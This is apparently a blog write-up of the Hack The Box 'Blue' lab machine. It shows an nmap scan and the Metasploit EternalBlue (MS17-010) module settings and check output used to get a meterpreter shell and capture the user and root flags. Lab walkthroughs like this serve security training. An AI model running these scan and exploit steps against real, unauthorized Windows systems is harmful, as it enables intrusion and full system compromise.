Skip to main content

Blue

2025-07-01 09:42

Status: Solved

Difficulty: Easy

Blue - HTB

Enumeration

Starting with a port scan, we can observe that we are dealing with a Windows machine possibly vulnerable to the notorious

 nmap -sV 10.10.10.40
Starting Nmap 7.95 ( https://nmap.org ) at 2025-07-01 08:39 CEST
Stats: 0:00:23 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 33.33% done; ETC: 08:40 (0:00:42 remaining)
Nmap scan report for 10.10.10.40
Host is up (0.029s latency).
Not shown: 991 closed tcp ports (conn-refused)
PORT      STATE SERVICE      VERSION
135/tcp   open  msrpc        Microsoft Windows RPC
139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)
49152/tcp open  msrpc        Microsoft Windows RPC
49153/tcp open  msrpc        Microsoft Windows RPC
49154/tcp open  msrpc        Microsoft Windows RPC
49155/tcp open  msrpc        Microsoft Windows RPC
49156/tcp open  msrpc        Microsoft Windows RPC
49157/tcp open  msrpc        Microsoft Windows RPC
Service Info: Host: HARIS-PC; OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 61.31 seconds

Exploitation

It's a no brainer to check with metasploit the eternalblue vulnerability.

I'm gonna use the windwos/smb/ms17_010_eternalblue exploit with the options of: RHOSTS= 10.10.10.40 LHOST= 10.10.14.6

Running check on the target metasploit confirms my suspicion of the eternalblue vulnerability

msf6 exploit(windows/smb/ms17_010_eternalblue) > check
[*] 10.10.10.40:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[+] 10.10.10.40:445       - Host is likely VULNERABLE to MS17-010! - Windows 7 Professional 7601 Service Pack 1 x64 (64-bit)
[*] 10.10.10.40:445       - Scanned 1 of 1 hosts (100% complete)
[+] 10.10.10.40:445 - The target is vulnerable.

Running the exploit we get a meterpreter shell to the target.

A non-default directory beneath the Users directory is haris which is the same name we saw in that nmap scan under the host section, so we should definitely chek this user.

After some traversing, we can find the user.txt flag in the haris/Desktop folder.

With the same logic, we also find the root.txt inside the Administrator user's desktop folder.